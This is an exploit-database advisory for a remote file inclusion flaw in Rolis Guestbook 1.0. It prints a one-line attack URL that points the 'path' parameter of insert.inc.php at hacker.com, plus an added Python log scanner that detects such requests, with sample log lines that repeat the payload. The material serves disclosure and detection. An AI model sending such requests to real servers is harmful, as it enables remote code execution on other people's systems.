Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion



EKU-ID: 28831
CVE:
OSVDB-ID:
Author: RusH security team
Published: 2003-11-17
Verified: Verified

source: https://www.securityfocus.com/bid/9054/info

It has been reported that Rolis Guestbook may be vulnerable to an input validation issue that could allow an attacker to include malicious files, causing the arbitrary code they contain to be executed on a vulnerable system.

Rolis Guestbook version 1.0 has been reported to be prone to this issue; however, other versions may be affected as well.

http://www.example.com/rolis_book_path/insert.inc.php?path=http://hacker.com/
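
For defenders reviewing web server logs, the request shape above can be detected by decoding the 'path' parameter of requests to insert.inc.php and checking whether it points at a remote location. This is an added example, not part of the original advisory; the function names and the log entries (combined log format assumed) are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

SCRIPT = "insert.inc.php"  # script named in the advisory
PARAM = "path"             # parameter named in the advisory

# Request line of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that begins with a URL scheme ("http://", "ftp://", ...) or "//host"
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|//)", re.IGNORECASE)

# Constructed sample entries (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Nov/2003:10:01:22 +0000] "GET /rolis_book_path/insert.inc.php?path=http://hacker.com/ HTTP/1.0" 200 512',
    '192.0.2.11 - - [17/Nov/2003:10:02:05 +0000] "GET /rolis_book_path/insert.inc.php?path=hTTp%3A%2F%2Fremote.example%2F HTTP/1.1" 200 512',
    '198.51.100.7 - - [17/Nov/2003:10:03:40 +0000] "GET /rolis_book_path/insert.inc.php?path=./ HTTP/1.1" 200 2048',
    '198.51.100.8 - - [17/Nov/2003:10:04:12 +0000] "GET /rolis_book_path/index.php?path=http://remote.example/ HTTP/1.1" 200 1024',
]


def remote_path_value(log_line):
    """Return the decoded 'path' value when the entry requests insert.inc.php
    with a remote location in that parameter, otherwise None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    # Decode the URL path so percent-encoded script names still match.
    if not unquote(target.path).lower().endswith("/" + SCRIPT):
        return None
    # parse_qs percent-decodes values, so encoded schemes are normalised.
    for value in parse_qs(target.query, keep_blank_values=True).get(PARAM, []):
        if REMOTE_RE.match(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every matching entry."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        value = remote_path_value(line)
        if value is not None:
            hits.append((lineno, value))
    return hits


if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: remote value in '{PARAM}': {value}")
```

A local value such as `./` is not flagged, and the check is limited to the script and parameter named in this advisory, so the fourth sample entry is ignored.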